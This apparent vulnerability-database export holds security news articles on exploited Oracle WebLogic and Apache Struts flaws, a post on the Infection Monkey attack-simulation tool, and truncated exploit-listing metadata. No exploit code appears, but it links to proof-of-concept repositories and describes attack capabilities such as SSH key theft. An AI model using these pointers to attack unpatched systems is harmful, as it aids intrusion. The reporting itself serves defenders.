month](<https://threatpost.com/oracle-tackles-405-bugs-for-april-quarterly-patch-update/154737/>).\n\nOracle WebLogic Server is a popular application server used in building and deploying enterprise Java EE applications. 
The server has a remote code execution flaw, CVE-2020-2883, that can be exploited by unauthenticated attackers to take over unpatched systems.\n\nEric Maurice, director of security assurance, said [in a post last week](<https://blogs.oracle.com/security/apply-april-2020-cpu>) that the flaw was addressed in [Oracle\u2019s April 2020 Critical Patch Update](<https://threatpost.com/oracle-tackles-405-bugs-for-april-quarterly-patch-update/154737/>), which fixed 405 flaws, including 286 that were remotely exploitable across nearly two dozen product lines.\n\n[](<https://threatpost.com/newsletter-sign/>)\n\n\u201cOracle continues to periodically receive reports of attempts to maliciously exploit vulnerabilities for which Oracle has already released security patches,\u201d according to Oracle\u2019s security update. \u201cIn some instances, it has been reported that attackers have been successful because targeted customers had failed to apply available Oracle patches. Oracle therefore strongly recommends that customers remain on actively-supported versions and apply Critical Patch Update security patches without delay.\u201d\n\nShortly before Oracle\u2019s warning of the active exploits, proof of concept exploit code [was also published](<https://github.com/hktalent/CVE_2020_2546>) by a researcher (under the alias \u201chktalent\u201d) on GitHub for the flaw last week.\n\nAccording to Trend Micro\u2019s Zero Day Initiative, the flaw [ranks 9.8 out of 10](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-2883>) on the CVSSv3 scale, making it critical severity. Two variants of the flaw were reported. The [first variant of the flaw](<https://www.zerodayinitiative.com/advisories/ZDI-20-504/>) exists within the handling of the T3 protocol, which is used to transport information between WebLogic servers and other types of Java programs. 
According to ZDI, crafted data in a T3 protocol message can trigger the deserialization of untrusted data \u2013 allowing an attacker to execute code in the context of the current process.\n\nThe second variant of the flaw exists within [the Oracle Coherence library](<https://www.zerodayinitiative.com/advisories/ZDI-20-570/>), Oracle\u2019s in-memory data grid and distributed caching solution.\n\n\u201cThe issue results from the lack of proper validation of user-supplied data, which can result in deserialization of untrusted data,\u201d according to ZDI. \u201cAn attacker can leverage this vulnerability to execute code in the context of the service account.\u201d\n\nAffected versions of WebLogic Server include versions 10.3.6.0.0, 12.1.3.0.0, 12.2.1.3.0 and 12.2.1.4.0.\n\nOracle did not disclose further details about how many were targeted or the attackers behind the hacks.\n\nOracle WebLogic servers continue to be hard hit with exploits. In May 2019, researchers warned that [malicious activity](<https://threatpost.com/oracle-weblogic-exploit-gandcrab-xmrig/144419/>) exploiting a recently disclosed Oracle WebLogic critical deserialization vulnerability (CVE-2019-2725) was surging \u2013 including to spread the \u201c[Sodinokibi\u201d ransomware](<https://threatpost.com/new-sodinokibi-ransomware-exploits-critical-oracle-weblogic-flaw/144233/>). In June 2019, Oracle said that a critical remote code execution flaw in its WebLogic Server ([CVE-2019-2729](<https://www.oracle.com/technetwork/security-advisory/alert-cve-2019-2729-5570780.html>)) was being actively exploited in the wild.\n\n**_Inbox security is your best defense against today\u2019s fastest growing security threat \u2013 phishing and Business Email Compromise attacks. [On May 13 at 2 p.m. 
ET](<https://register.gotowebinar.com/register/5064791868226032141?source=ART>), join Valimail security experts and Threatpost for a FREE webinar, [5 Proven Strategies to Prevent Email Compromise](<https://register.gotowebinar.com/register/5064791868226032141?source=ART>). Get exclusive insights and advanced takeaways on how to lockdown your inbox to fend off the latest phishing and BEC assaults. Please [register here ](<https://register.gotowebinar.com/register/5064791868226032141?source=ART>)for this sponsored webinar._**\n\n_**Also, don\u2019t miss our latest on-demand webinar from DivvyCloud and Threatpost, **_[_**A Practical Guide to Securing the Cloud in the Face of Crisis**_](<https://attendee.gotowebinar.com/register/4136632530104301068?source=art>)_**, with critical, advanced takeaways on how to avoid cloud disruption and chaos.**_\n", "cvss3": {}, "published": "2020-05-04T14:57:51", "type": "threatpost", "title": "Oracle: Unpatched Versions of WebLogic App Server Under Active Attack", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2019-2725", "CVE-2019-2729", "CVE-2020-2883"], "modified": "2020-05-04T14:57:51", "id": "THREATPOST:15EF9F86D0EEBCD1CD450BF55954D1D2", "href": "https://threatpost.com/oracle-unpatched-versions-of-weblogic-app-server-under-active-attack/155420/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-10-29T22:18:34", "description": "If an organization hasn\u2019t updated their Oracle WebLogic servers to protect them against a recently disclosed RCE flaw, researchers have a dire warning: \u201cAssume it has been compromised.\u201d\n\nOracle WebLogic Server is a popular application server used in building and deploying enterprise Java EE applications. The console component of the WebLogic Server has a flaw, CVE-2020-14882, which ranks 9.8 out of 10 on the CVSS scale. 
According to Oracle, the attack is \u201clow\u201d in complexity, requires no privileges and no user interaction and can be exploited by attackers with network access via HTTP.\n\nThe flaw was fixed by [Oracle in the massive October release](<https://threatpost.com/oracle-october-patch-update/160407/>) of its quarterly Critical Patch Update (CPU), which fixed 402 vulnerabilities across various product families. Supported versions that are affected are 10.3.6.0.0, 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0 and 14.1.1.0.0.\n\nThe October update was released Oct. 21. Fast forward to this week: Johannes B. Ullrich, dean of research at the SANS Technology Institute, said on Thursday that based on honeypot observations, cybercriminals are now actively targeting the flaw.\n\n\u201cAt this point, we are seeing the scans slow down a bit,\u201d said Ullrich [in a Thursday post](<https://isc.sans.edu/forums/diary/PATCH+NOW+CVE202014882+Weblogic+Actively+Exploited+Against+Honeypots/26734/>). \u201cBut they have reached \u2018saturation\u2019 meaning that all IPv4 addresses have been scanned for this vulnerability. If you find a vulnerable server in your network: Assume it has been compromised.\u201d\n\nUllrich said the exploits appear to be based on a Wednesday blog post published (in Vietnamese) by \u201cJang,\u201d who described how to leverage the flaw to achieve remote code execution via only one GET request. Below is a proof of concept (POC) video.\n\nUllrich said exploit attempts on the honeypots so far originate from four IP addresses: 114.243.211.182, 139.162.33.228, 185.225.19.240 and 84.17.37.239.\n\nUllrich [and others](<https://twitter.com/GossiTheDog/status/1321430443611328513>) are urging Oracle WebLogic Server users to update their systems as soon as possible. 
Users can find a patch availability document for WebLogic and other vulnerable Oracle products, [available here](<https://www.oracle.com/security-alerts/cpuoct2020traditional.html>).\n\n> One for detection peeps. This Oracle WebLogic bug will get abused, pre-auth RCE via a POST request. <https://t.co/y6huXWUuS0>\n> \n> \u2014 Kevin Beaumont (@GossiTheDog) [October 28, 2020](<https://twitter.com/GossiTheDog/status/1321430443611328513?ref_src=twsrc%5Etfw>)\n\nOracle WebLogic servers continue to be hard hit with exploits. In May 2020, Oracle urged customers to [fast-track a patch for a critical flaw](<https://threatpost.com/oracle-unpatched-versions-of-weblogic-app-server-under-active-attack/155420/>) in its WebLogic Server under active attack. The company said it has received numerous reports that attackers were targeting the vulnerability [patched last month](<https://threatpost.com/oracle-tackles-405-bugs-for-april-quarterly-patch-update/154737/>). In May 2019, researchers warned that [malicious activity](<https://threatpost.com/oracle-weblogic-exploit-gandcrab-xmrig/144419/>) exploiting a recently disclosed Oracle WebLogic critical deserialization vulnerability (CVE-2019-2725) was surging \u2013 including to spread the \u201c[Sodinokibi\u201d ransomware](<https://threatpost.com/new-sodinokibi-ransomware-exploits-critical-oracle-weblogic-flaw/144233/>). In June 2019, Oracle said that a critical remote code execution flaw in its WebLogic Server ([CVE-2019-2729](<https://www.oracle.com/technetwork/security-advisory/alert-cve-2019-2729-5570780.html>)) was being actively exploited in the wild.\n\n**Hackers Put Bullseye on Healthcare: [On Nov. 18 at 2 p.m. EDT](<https://threatpost.com/webinars/2020-healthcare-cybersecurity-priorities-data-security-ransomware-and-patching/?utm_source=ART&utm_medium=ART&utm_campaign=Nov_webinar>) find out why hospitals are getting hammered by ransomware attacks in 2020. 
[Save your spot for this FREE webinar](<https://threatpost.com/webinars/2020-healthcare-cybersecurity-priorities-data-security-ransomware-and-patching/?utm_source=ART&utm_medium=ART&utm_campaign=Nov_webinar>) on healthcare cybersecurity priorities and hear from leading security voices on how data security, ransomware and patching need to be a priority for every sector, and why. Join us Wed., Nov. 18, 2-3 p.m. EDT for this [LIVE](<https://threatpost.com/webinars/2020-healthcare-cybersecurity-priorities-data-security-ransomware-and-patching/?utm_source=ART&utm_medium=ART&utm_campaign=Nov_webinar>), limited-engagement webinar.**\n", "cvss3": {}, "published": "2020-10-29T14:49:58", "type": "threatpost", "title": "Oracle WebLogic Server RCE Flaw Under Active Attack", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2019-2725", "CVE-2019-2729", "CVE-2020-14882"], "modified": "2020-10-29T14:49:58", "id": "THREATPOST:4844442F117316BC8EEC54269FACDAA8", "href": "https://threatpost.com/oracle-weblogic-server-rce-flaw-attack/160723/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-05-31T21:54:31", "description": "Oracle said that a critical remote code execution flaw in its WebLogic Server is being actively exploited in the wild.\n\nThe remote code execution flaw ([CVE-2019-2729](<https://www.oracle.com/technetwork/security-advisory/alert-cve-2019-2729-5570780.html>)) impacts a number of versions of Oracle\u2019s WebLogic Server, used for building and deploying enterprise applications. The vulnerability has a CVSS score of 9.8 out of 10. 
Part of its seriousness is because it is remotely exploitable without authentication.\n\n\u201cDue to the severity of this vulnerability, Oracle strongly recommends that customers apply the updates provided by this Security Alert as soon as possible,\u201d according to Oracle\u2019s Tuesday [security advisory.](<https://www.oracle.com/technetwork/security-advisory/alert-cve-2019-2729-5570780.html>)\n\nThe issue stems from a deserialization vulnerability in the XMLDecoder in Oracle\u2019s WebLogic Server web services. The XMLDecoder class is used to read XML documents created using the XMLEncoder, according to Oracle.\n\nImpacted are Oracle WebLogic Server versions 10.3.6.0.0, 12.1.3.0.0 and 12.2.1.3.0.\n\nResearchers with KnownSec 404 said the vulnerability bypasses a fix for an infamous Oracle WebLogic Server deserialization flaw ([CVE-2019-2725](<https://www.oracle.com/technetwork/security-advisory/alert-cve-2019-2725-5466295.html>)), which was disclosed earlier this year and patched on April 26.\n\n\u201cA new Oracle WebLogic deserialization RCE 0day vulnerability was found and is being actively used in the wild. We analyzed and reproduced the 0day vulnerability, which is based on and bypasses the patch for CVE-2019-2725,\u201d researchers said in an analysis [over the weekend](<https://medium.com/@knownsec404team/knownsec-404-team-alert-again-cve-2019-2725-patch-bypassed-32a6a7b7ca15?postPublishedType=repub>).\n\nHowever, John Heimann, vice president of security program management, shut down researchers\u2019 claims that the newly-disclosed flaw is related to CVE-2019-2725, saying the two are unrelated: \u201cPlease note that while the issue addressed by this alert is a deserialization vulnerability, like that addressed in Security Alert CVE-2019-2725, it is a distinct vulnerability,\u201d he said in [a Tuesday security 
alert](<https://blogs.oracle.com/security/security-alert-cve-2019-2729-released>).\n\nNeither Oracle nor KnownSec 404 has responded to requests for comment regarding the two contradicting reports.\n\nRegardless, researchers with KnownSec 404, who are credited (among others) for discovering the flaw, said that they have seen the vulnerability being actively exploited in the wild, and warned users to update.\n\n> [#Oracle](<https://twitter.com/hashtag/Oracle?src=hash&ref_src=twsrc%5Etfw>) [#WebLogic](<https://twitter.com/hashtag/WebLogic?src=hash&ref_src=twsrc%5Etfw>) Deserialization RCE Vulnerability (0day) Alert Again (CVE-2019-2725 patch bypassed\u203c\ufe0f) Check out the temporary solution offered by KnownSec 404 Team:<https://t.co/1jOYrnysFy>\n> \n> \u2014 Seebug (@seebug_team) [June 15, 2019](<https://twitter.com/seebug_team/status/1139924754759131136?ref_src=twsrc%5Etfw>)\n\nCritical flaws in Oracle WebLogic Servers continue to be a thorn in the security community\u2019s side.\n\nResearchers said that attackers have been exploiting the older deserialization flaw, CVE-2019-2725, since April 21 in malicious campaigns revolving around the \u201c[Sodinokibi\u201d ransomware](<https://threatpost.com/new-sodinokibi-ransomware-exploits-critical-oracle-weblogic-flaw/144233/>), [a new variant](<https://threatpost.com/muhstik-botnet-variant-targets-just-patched-oracle-weblogic-flaw/144253/>) of the Muhstik botnet, and [GandCrab ransomware](<https://threatpost.com/oracle-weblogic-exploit-gandcrab-xmrig/144419/>).\n\nThe sheer number of vulnerable devices and exploit attempts around this flaw show how serious it is: A scan in May showed more than 41,000 publicly accessible WebLogic instances in the wild, while Palo Alto Networks said that they detected over 600 exploitation attempts targeting CVE-2019-2725.\n\n**_Ransomware is on the rise: _**[**_Don\u2019t miss our free Threatpost webinar 
_**](<https://attendee.gotowebinar.com/register/611039692762707715?source=ART>)**_on the ransomware threat landscape, June 19 at 2 p.m. ET. _****_Join _****_Threatpost _****_and a panel of experts from Malwarebytes, Recorded Future and Moss Adams as they discuss_****_ how to manage the risk associated with this unique attack type,_** **_with exclusive insights into new developments on the ransomware front and how to stay ahead of the attackers._**\n", "cvss3": {}, "published": "2019-06-19T16:25:30", "type": "threatpost", "title": "Oracle Warns of New Actively-Exploited WebLogic Flaw", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2019-2725", "CVE-2019-2729", "CVE-2020-9586"], "modified": "2019-06-19T16:25:30", "id": "THREATPOST:E415CA5BCD7AC520A44AB5246664528A", "href": "https://threatpost.com/oracle-warns-of-new-actively-exploited-weblogic-flaw/145829/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-10-14T22:21:14", "description": "Proof-of-concept exploit code surfaced on GitHub on Friday, raising the stakes on two existing Apache Struts 2 bugs that allow for remote code-execution and denial-of-service attacks on vulnerable installations.\n\nThe Cybersecurity and Infrastructure Security Agency (CISA) issued an alert regarding the two bugs, tracked as [CVE-2019-0230](<https://cwiki.apache.org/confluence/display/WW/S2-059>) and [CVE-2019-0233](<https://cwiki.apache.org/confluence/display/WW/S2-060>). Impacted are Apache Struts versions 2.0.0 through 2.5.20. Remediation includes upgrading to Struts 2.5.22, according to the Apache Struts Security Team.\n\nStruts 2 is an open-source coding framework and library for enterprise developers popular with developers and companies when creating Java-based applications. Both the exploitable vulnerabilities in question were fixed last November. 
\n\nResearchers have warned of outdated installations of Apache Struts 2 and that [if left unpatched](<https://threatpost.com/equi-facts-equifax-clarifies-the-numbers-for-its-massive-breach/131797/>) they can open the door to more critical holes similar to a bug at the root of the [massive Equifax breach](<https://threatpost.com/equi-facts-equifax-clarifies-the-numbers-for-its-massive-breach/131797/>), which was also an Apache Struts 2 flaw ([CVE-2017-5638](<https://threatpost.com/equifax-confirms-march-struts-vulnerability-behind-breach/127975/>)).\n\n## **PoC Released to GitHub**\n\nThe proof-of-concept (PoC) [released this week](<https://github.com/cellanu/cve-2019-0230>) raises the greatest concern with CVE-2019-0230, originally rated important when first uncovered by Matthias Kaiser at Apple Information Security. The bug is triggered when a threat actor sends malicious Object-Graph Navigation Language (OGNL) expressions that can then open the door for a remote code-execution attack, according to the security bulletin. OGNL is a Java expression language that can let attackers access data objects, and then use them to create and inject server-side code.\n\n\u201cSuccessful exploitation of the most severe of these vulnerabilities (CVE-2019-0230) could allow for remote code-execution in the context of the affected application. Depending on the privileges associated with the application, an attacker could install programs; view, change or delete data; or create new accounts with full user rights,\u201d according to a bulletin issued Friday by the Multi-State Information Sharing & Analysis Center at the Center for Internet Security.\n\nWhile the PoC attack and exploit posted to GitHub targets CVE-2019-0230, the Apache Struts Security Team also urged users to patch for the DoS bug (CVE-2019-0233). 
The vulnerability affects the write permissions of file directories that could lead to conditions ripe for a DoS attack.\n\nAccording to the Apache Struts 2 Wiki description of the bug, this flaw can be triggered with a file upload to a Struts Action that exposes the file.\n\n\u201cAn attacker may manipulate the request such that the working copy of the uploaded file is set to read-only. As a result, subsequent actions on the file will fail with an error. It might also be possible to set the Servlet container\u2019s temp directory to read only, such that subsequent upload actions will fail,\u201d [according to the description](<https://cwiki.apache.org/confluence/display/WW/S2-060>).\n\nThe Apache security bulletin recommends upgrading to the most recent version of Apache Struts. It also suggests security teams verify no unauthorized system modifications have occurred on the system before applying the patch, and that they run all software as a non-privileged user (one without administrative privileges) to diminish the effects of a successful attack.\n\n**_It\u2019s the age of remote working, and businesses are facing new and bigger cyber-risks \u2013 whether it\u2019s collaboration platforms in the crosshairs, evolving insider threats or issues with locking down a much broader footprint. Find out how to address these new cybersecurity realities with our complimentary [Threatpost eBook](<https://threatpost.com/ebooks/2020-in-security-four-stories-from-the-new-threat-landscape/?utm_source=ART&utm_medium=articles&utm_campaign=fp_ebook>), 2020 in Security: Four Stories from the New Threat Landscape, presented in conjunction with Forcepoint. We redefine \u201csecure\u201d in a work-from-home world and offer compelling real-world best practices. 
[Click here to download our eBook now](<https://threatpost.com/ebooks/2020-in-security-four-stories-from-the-new-threat-landscape/?utm_source=ART&utm_medium=articles&utm_campaign=fp_ebook>)._**\n", "cvss3": {}, "published": "2020-08-14T21:20:01", "type": "threatpost", "title": "PoC Exploit Targeting Apache Struts Surfaces on GitHub", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-5638", "CVE-2019-0230", "CVE-2019-0233", "CVE-2020-5135"], "modified": "2020-08-14T21:20:01", "id": "THREATPOST:0DD2AEA1738F9B6612B1C845F3BC949F", "href": "https://threatpost.com/poc-exploit-github-apache-struts/158393/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "pentestit": [{"lastseen": "2018-12-03T23:18:27", "description": "PenTestIT RSS Feed\n\nI'm sure you must have read my previous post title the [List of Adversary Emulation Tools](<http://pentestit.com/adversary-emulation-tools-list/>). In that post, I briefly mentioned about the Guardicore Infection Monkey. Good news now is that it has been updated! We now have **Infection Monkey 1.6.1**. An important change about this version is that this is an AWS only version.\n\n[](< http://pentestit.com/update-infection-monkey-1-6-1/>) \n\n\nWhat is Infection Monkey?\n\n> The Infection Monkey is an open source Breach and Attack Simulation (BAS) tool that assesses the resiliency of private and public cloud environments to post-breach attacks and lateral movement. It operates in much the same way a real attacker would - starting from a random location in the network and propagating from there, while looking for all possible paths of exploitation.\n\n## Infection Monkey 1.6.1 Changes:\n\nInfection Monkey 1.6.1 has now been integrated with the AWS Security Hub. 
This allows anyone to verify and test the resilience of their AWS environment and correlate this information with the native security solutions and benchmark score!\n\nAdditionally, I missed posting about another release - **Infection Monkey 1.6** which is also important. Hence, I'm posting about it here:\n\n## Infection Monkey 1.6 Change Log:\n\n**New Features:**\n\n * Detect cross segment traffic! The Monkey can now easily test whether two network segments are properly separated. PR [#120](<https://github.com/guardicore/monkey/pull/120>).\n * The Monkey can analyse your domain for possible Pass the Hash attacks. By cross referencing information collected by Mimikatz, the Monkey can now detect usage of identical passwords, cached logins with access to critical servers and more. [#170](<https://github.com/guardicore/monkey/pull/170>)\n * SSH key stealing. The monkey will now steal accessible SSH keys and use them when connecting to SSH servers, PR [#138](<https://github.com/guardicore/monkey/pull/138>).\n * Implement a cross platform attack for [Struts2 Multi-part file upload vulnerability](<https://cwiki.apache.org/confluence/display/WW/S2-045>), PR [#179](<https://github.com/guardicore/monkey/pull/179>).\n * Implement a cross platform attack for Oracle Web Logic CVE-2017-10271, PR [#180](<https://github.com/guardicore/monkey/pull/180>).\n * ElasticGroovy attack now supports Windows victims, PR [#181](<https://github.com/guardicore/monkey/pull/181>).\n * Hadoop cluster RCE - Abuse unauthenticated access to YARN resource manager, PR [#182](<https://github.com/guardicore/monkey/pull/182>).\n\n**Code improvements:**\n\n * We've refactored the codebase, so now it's easier to share code between the Monkey and the Monkey Island components. PR [#145](<https://github.com/guardicore/monkey/pull/145>).\n * Mimikatz is now bundled into a password protected ZIP file and extracted only if required. Makes deployment easier with AV software. 
PR [#169](<https://github.com/guardicore/monkey/pull/169>).\n * Monkey Island now properly logs itself to a file and console. So if you got bugs, it'll now be easier to figure them out. PR [#139](<https://github.com/guardicore/monkey/pull/139>).\n * Systemd permissions are now properly locked down.\n * Fixed a situation where a successful shellshock attack could freeze the attacking Monkey. [#200](<https://github.com/guardicore/monkey/pull/200>)\n\nIn other words, the Monkey can now detect potential attack paths between computers within the same domain or workgroup using credential reuse, the pass-the-hash technique and cached logins. In addition to the already existing attacks, Infection Monkey 1.6.1 now includes support for the Struts2 Multipart file upload vulnerability (CVE-2017-5638), Oracle WebLogic Server WLS Security component vulnerability (CVE-2017-10271), Elasticsearch Groovy attack (CVE-2015-1427) & the Hadoop YARN Resource Manager remote code execution vulnerability.\n\nLots of exciting stuff from the guys at Guardicore Labs. Really good work!\n\n## Download Infection Monkey 1.6.1:\n\nThe following Infection Monkey 1.6.1 files are available for download:\n\n 1. infection_monkey_1.6.1_AWS_only.zip\n 2. 
infection_monkey_1.6.1_AWS_only.tar.gz\n\nGet them **[here](<https://github.com/guardicore/monkey/releases/tag/infection_monkey_1.6.1_AWS_only>)**.\n\nThe post [UPDATE: Infection Monkey 1.6.1](<http://pentestit.com/update-infection-monkey-1-6-1/>) appeared first on [PenTestIT](<http://pentestit.com>).", "cvss3": {}, "published": "2018-12-03T22:28:53", "type": "pentestit", "title": "UPDATE: Infection Monkey 1.6.1", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2017-10271", "CVE-2017-5638"], "modified": "2018-12-03T22:28:53", "id": "PENTESTIT:F5DFB26B34C75683830E664CBD58178F", "href": "http://pentestit.com/update-infection-monkey-1-6-1/", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "githubexploit": [{"lastseen": "2021-12-29T23:35:43", "description": "# CVE-2019-2725\nWebLogic Universal Exploit - CVE-2017-3506 / CVE...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2019-08-23T01:42:57", "type": "githubexploit", "title": "Exploit for Injection in Oracle Weblogic Server", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-2725", 
"CVE-2019-2729", "CVE-2017-10271", "CVE-2017-3506"], "modified": "2021-12-29T12:52:27", "id": "7BA07704-21CC-5BFC-A0F9-8FDA2BC84402", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2021-12-10T14:26:46", "description": "# CVE-2019-2725-POC...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2019-12-12T03:09:23", "type": "githubexploit", "title": "Exploit for Injection in Oracle Weblogic Server", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-2725"], "modified": "2019-12-12T03:11:14", "id": "20E0E007-A9C4-58EA-917F-E225D8785B3F", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-08-04T17:42:51", "description": "# CVE-2019-2725\n\nCVE-2019-2725(CNVD-C-2019-48814\u3001WebLogic wls9-a...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 
9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2019-05-29T01:57:05", "type": "githubexploit", "title": "Exploit for Injection in Oracle Agile Plm", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-2725"], "modified": "2022-08-04T07:47:37", "id": "24A6D0CC-8F53-539E-8FBC-D5222C4BC565", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-04-27T23:29:01", "description": "# Oracle-WLS-Weblogic-RCE\n(CVE-2019-2725) Oracle WLS(Weblogic) R...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-08-31T14:09:09", "type": "githubexploit", "title": "Exploit for Injection in Oracle Agile Plm", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": 
"AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-2725"], "modified": "2020-11-07T13:04:21", "id": "62E1CDF6-537F-52B5-8ACE-87CDDFB3544D", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-08-15T19:21:36", "description": "# CVE-2019-2725\n# weblogic\u547d\u4ee4\u56de\u663e+webshell\u4e0a\u4f20<br/>\n**\u514d\u8d23\u58f0\u660e:\u672c\u5de5\u5177\u4ec5\u4f9b\u5b89\u5168\u6d4b\u8bd5\u5b66...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2019-06-10T05:12:44", "type": "githubexploit", "title": "Exploit for Injection in Oracle Agile Plm", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-2725"], "modified": "2022-08-15T15:41:28", "id": "96B2FD46-0F7E-5581-BBA6-E4A48966E225", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-08-18T13:52:52", "description": "<!DOCTYPE html>\n<html dir=\"rtl\" lang=\"fa-IR\">\n\n<head>\n\t<meta 
